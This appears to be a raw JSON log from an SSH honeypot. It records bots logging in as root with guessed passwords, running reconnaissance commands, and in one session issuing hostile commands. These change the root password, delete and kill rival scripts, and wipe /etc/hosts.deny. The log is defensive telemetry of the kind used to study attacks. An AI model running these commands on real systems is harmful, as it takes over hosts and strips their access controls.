{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:17:18.487309Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep name | wc -l","sensor":"my-vps","timestamp":"2025-08-26T18:17:18.488022Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","size":2,"shasum":"3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:17:18.725491Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:17:19.294230Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.command.input","input":"echo \"root:CSAO9khaiFKL\"|chpasswd|bash","message":"CMD: echo \"root:CSAO9khaiFKL\"|chpasswd|bash","sensor":"my-vps","timestamp":"2025-08-26T18:17:19.294988Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/d583321ba99cd8c4a72130b77e694d63080bc93f521560990b4e3fc9c1773156","size":21,"shasum":"d583321ba99cd8c4a72130b77e694d63080bc93f521560990b4e3fc9c1773156","duplicate":false,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/d583321ba99cd8c4a72130b77e694d63080bc93f521560990b4e3fc9c1773156 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:17:19.530964Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:17:20.102339Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.command.input","input":"rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","message":"CMD: rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","sensor":"my-vps","timestamp":"2025-08-26T18:17:20.103081Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","shasum":"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","destfile":"/etc/hosts.deny","message":"Saved redir contents with SHA-256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b to var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","sensor":"my-vps","timestamp":"2025-08-26T18:17:20.342834Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","size":0,"shasum":"a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:17:20.343871Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:17:20.831629Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","message":"CMD: cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","sensor":"my-vps","timestamp":"2025-08-26T18:17:20.832386Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","size":35,"shasum":"95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:17:21.069360Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:17:21.631030Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.command.input","input":"free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","message":"CMD: free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","sensor":"my-vps","timestamp":"2025-08-26T18:17:21.631697Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","size":29,"shasum":"ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:17:21.868680Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:17:22.397765Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.command.input","input":"ls -lh $(which ls)","message":"CMD: ls -lh $(which ls)","sensor":"my-vps","timestamp":"2025-08-26T18:17:22.398539Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.command.input","input":"which ls","message":"CMD: which ls","sensor":"my-vps","timestamp":"2025-08-26T18:17:22.399126Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","size":55,"shasum":"a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:17:22.635871Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:17:23.126631Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.command.input","input":"crontab -l","message":"CMD: crontab -l","sensor":"my-vps","timestamp":"2025-08-26T18:17:23.127429Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","size":20,"shasum":"f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:17:23.363408Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:17:23.933287Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.command.input","input":"w","message":"CMD: w","sensor":"my-vps","timestamp":"2025-08-26T18:17:23.933983Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","size":205,"shasum":"50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:17:24.171189Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:17:24.665139Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.command.input","input":"uname -m","message":"CMD: uname -m","sensor":"my-vps","timestamp":"2025-08-26T18:17:24.665888Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","size":7,"shasum":"ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:17:24.902560Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:17:25.466124Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep model | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep model | grep name | wc -l","sensor":"my-vps","timestamp":"2025-08-26T18:17:25.466924Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","size":2,"shasum":"64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:17:25.703535Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:17:26.236459Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.command.input","input":"top","message":"CMD: top","sensor":"my-vps","timestamp":"2025-08-26T18:17:26.237208Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","size":44,"shasum":"28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:17:26.474431Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:17:26.964157Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.command.input","input":"uname","message":"CMD: uname","sensor":"my-vps","timestamp":"2025-08-26T18:17:26.964902Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","size":6,"shasum":"5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:17:27.201083Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:17:27.786811Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-26T18:17:27.787751Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:17:28.024507Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:17:28.514415Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-26T18:17:28.515169Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:17:28.751264Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:17:29.326105Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.command.input","input":"lscpu | grep Model","message":"CMD: lscpu | grep Model","sensor":"my-vps","timestamp":"2025-08-26T18:17:29.327157Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","size":26,"shasum":"afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:17:29.565356Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:17:30.122979Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.command.input","input":"df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","message":"CMD: df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","sensor":"my-vps","timestamp":"2025-08-26T18:17:30.123945Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","size":10,"shasum":"09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:17:30.362638Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.session.closed","duration":"27.7","message":"Connection lost after 27.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:17:30.363930Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":25466,"dst_ip":"1.2.3.4","dst_port":22,"session":"a23be05cb7bd","protocol":"ssh","message":"New connection: 212.227.125.160:25466 (1.2.3.4:22) [session: a23be05cb7bd]","sensor":"my-vps","timestamp":"2025-08-26T18:17:40.662954Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T18:17:41.107311Z","src_ip":"212.227.125.160","session":"a23be05cb7bd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T18:17:41.108791Z","src_ip":"212.227.125.160","session":"a23be05cb7bd"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssword64","message":"login attempt [root/P@ssword64] succeeded","sensor":"my-vps","timestamp":"2025-08-26T18:17:45.820477Z","src_ip":"212.227.125.160","session":"a23be05cb7bd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:17:49.827356Z","src_ip":"212.227.125.160","session":"a23be05cb7bd"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-26T18:17:49.828049Z","src_ip":"212.227.125.160","session":"a23be05cb7bd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"1.6","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:17:51.394309Z","src_ip":"212.227.125.160","session":"a23be05cb7bd"}
{"eventid":"cowrie.session.closed","duration":"11.3","message":"Connection lost after 11.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:17:51.978754Z","src_ip":"212.227.125.160","session":"a23be05cb7bd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37330,"dst_ip":"1.2.3.4","dst_port":22,"session":"7503be763623","protocol":"ssh","message":"New connection: 212.227.235.229:37330 (1.2.3.4:22) [session: 7503be763623]","sensor":"my-vps","timestamp":"2025-08-26T18:18:14.118361Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T18:18:14.670259Z","src_ip":"212.227.235.229","session":"7503be763623"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T18:18:14.670949Z","src_ip":"212.227.235.229","session":"7503be763623"}
{"eventid":"cowrie.login.success","username":"root","password":"winners","message":"login attempt [root/winners] succeeded","sensor":"my-vps","timestamp":"2025-08-26T18:18:18.096981Z","src_ip":"212.227.235.229","session":"7503be763623"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:18:19.302979Z","src_ip":"212.227.235.229","session":"7503be763623"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":53828,"dst_ip":"1.2.3.4","dst_port":22,"session":"42f7e8f0adc6","protocol":"ssh","message":"New connection: 217.72.205.35:53828 (1.2.3.4:22) [session: 42f7e8f0adc6]","sensor":"my-vps","timestamp":"2025-08-26T18:18:20.402147Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:18:20.403528Z","src_ip":"217.72.205.35","session":"42f7e8f0adc6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53382,"dst_ip":"1.2.3.4","dst_port":22,"session":"473ea830b2f2","protocol":"ssh","message":"New connection: 212.227.235.229:53382 (1.2.3.4:22) [session: 473ea830b2f2]","sensor":"my-vps","timestamp":"2025-08-26T18:19:09.688930Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:19:09.689610Z","src_ip":"212.227.235.229","session":"473ea830b2f2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:19:09.921690Z","src_ip":"212.227.235.229","session":"473ea830b2f2"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:19:10.298400Z","src_ip":"212.227.235.229","session":"473ea830b2f2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54772,"dst_ip":"1.2.3.4","dst_port":22,"session":"c1292d7c4f81","protocol":"ssh","message":"New connection: 212.227.235.229:54772 (1.2.3.4:22) [session: c1292d7c4f81]","sensor":"my-vps","timestamp":"2025-08-26T18:21:12.764246Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:21:12.765926Z","src_ip":"212.227.235.229","session":"c1292d7c4f81"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:21:13.000369Z","src_ip":"212.227.235.229","session":"c1292d7c4f81"}
